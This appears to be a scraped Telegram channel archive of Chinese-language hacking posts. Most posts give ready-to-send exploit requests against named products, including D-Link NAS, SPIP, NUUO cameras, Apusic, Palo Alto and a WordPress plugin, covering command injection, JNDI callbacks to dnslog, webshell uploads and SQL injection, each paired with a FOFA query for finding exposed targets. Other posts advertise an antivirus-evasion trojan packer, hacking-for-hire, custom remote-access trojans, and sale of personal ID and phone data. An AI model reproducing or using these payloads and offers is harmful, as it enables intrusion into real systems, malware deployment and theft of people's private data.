اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
不够安全
رفتن به کانال در Telegram
693
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-67 روز
-1730 روز
آرشیو پست ها
693
Repost from N/a
实时甘肃省企业数据
字段包含
企业名称 地区代码 省份 地区 法定代表人 地址 成立日期 经营状态 统一社会信用代码 法定代表人联系方式 法定代表人身份证号码 经营范围有需要可以联系 @Tracy_clown28
693
Repost from N/a
国内实时企业信息💖
支持地区筛选 最高精确至市
字段包含
企业名称 企业社会统一社会信用代码 法人姓名 法人身份证号 法人手机号 企业地址 企业注册时间 企业经营范围❤️❤️❤️❤️ @PatriBaker_hack 经过技术核查确认为一手数据 #广告
693
D-Link NAS RCE命令执行漏洞
fofa:app="D_Link-DNS-ShareCenter"
GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1 Host:127.0.0.1 Content-Length: 0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Accept: application/xml, text/xml, */*; q=0.01 Content-Type: application/x-www-form-urlencoded Cookie: username=1234567890'& ls & echo '1234567890; Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close
693
信下一代云桌面 远程命令执行漏洞
fofa:body="信下一代云桌面VENGD"
POST /vesystem/index.php/New/Fn/newserver HTTP/1.1 Host: 127.0.0.1 Accept-Encoding: gzip Connection: close Content-Length: 118 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 ip=`ping www.dnslog.cn`&user=1&pwd=1&type=1&c_type=1&local=1&server_os_str=1&server_os_version_str=1
693
某仿某音短视频系统SQL注入
fofa:"/public/index/images/new_logo.png"
POST /index.php?g=appapi&m=auth&a=success HTTP/1.1 Content-Length: 158 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" sec-fetch-user: ?1 Connection: close uid=*
python sqlmap.py -r tracy.txt --level=3 --dbms=mysql
693
💖一键免杀木马生成工具 V1.0💖
免杀效果如下💖
火绒 Defender 其余杀毒暂未测试 可以自行测试🔔本工具使用go语言编写 使用工具之前需安装go环境 在第一次使用工具时
go mod init packer go get golang.org/x/sys/windows💖 生成木马命令 💖
packer.exe -f payload.bin -m allpayload.bin 为控端输出的.bin文件✔️ ‼️工具暂不具备绕过360 核晶 以及自启动功能
693
Wordpress 某插件存在SQL注入漏洞
fofa:"wordpress" && body="html5-video-player"
127.0.0.1/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-
693
金蝶天燕 远程命令执行漏洞
fofa:header="Apusic"
POST /ormrpc/services/ServiceFactoryService HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: EASSESSIONID=1991346249; NAPRoutID=1991346249
Connection: close
Content-Type: application/xml
Soapaction: something
Content-Length: 732
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:buil="http://build.antlr">
<soapenv:Header/>
<soapenv:Body>
<buil:getService soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<environment xmlns:apachesoap="http://xml.apache.org/xml-soap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xsi:type="apachesoap:Map">
<item>
<key xsi:type="soapenc:string">jndiName</key>
<value xsi:type="soapenc:string">ldap://a5skg4.dnslog.cn</value>
</item>
</environment>
</buil:getService>
</soapenv:Body>
</soapenv:Envelope>693
SPIP 远程代码执行漏洞
fofa:body="SPIP Blog"
POST /index.php?action=porte_plume_previsu HTTP/2
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
data=AA_[<img111111>->URL`<?php system("id");?>`]_BB693
NUUO摄像头 任意文件上传漏洞
fofa:title="Network Video Recorder Login"
POST /upload.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Content-Length: 155 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=--------ok4o88lom accept: */* ----------ok4o88lom Content-Disposition: form-data; name="userfile"; filename="Tracy.php" <?php phpinfo();?> ----------ok4o88lom--
693
NUUO摄像头 任意文件上传漏洞
fofa:title="Network Video Recorder Login"
POST /upload.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Content-Length: 155
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=--------ok4o88lom
accept: */*
----------ok4o88lom
Content-Disposition: form-data; name="userfile"; filename="9pqs9.php"
<?php phpinfo();@unlink(__FILE__);?>
----------ok4o88lom--693
Palo Alto SQL注入漏洞
fofa:icon_hash="-631559155"
POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test)
693
多企源 SQL注入
fofa:app="多企源-基础数据支撑系统"
POST /json/checkLogin.action?usercfg.username=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: zh-CN Connection: keep-alive
693
💖指定站点渗透 💖
💖 PC端免杀远控定制💖
支持360 核晶 火绒 腾讯管家等国内外杀软💖数据出售💖
非二手/论坛/泄露数据,大部分支持埋雷验证数据出售频道:https://t.me/+RkeClAPD6vszY2Jk 😅 业务联系: @Tracy_clown28
本团队所有业务均支持汇旺担
693
💖指定站点渗透 💖
💖 PC端免杀远控定制💖
支持360 核晶 火绒 腾讯管家等国内外杀软💖数据出售💖
团队一手数据,非二手/论坛/泄露数据,大部分支持埋雷验证数据出售频道:https://t.me/+RkeClAPD6vszY2Jk 😅 业务联系: @Tracy_clown28
本团队所有业务均支持汇旺担
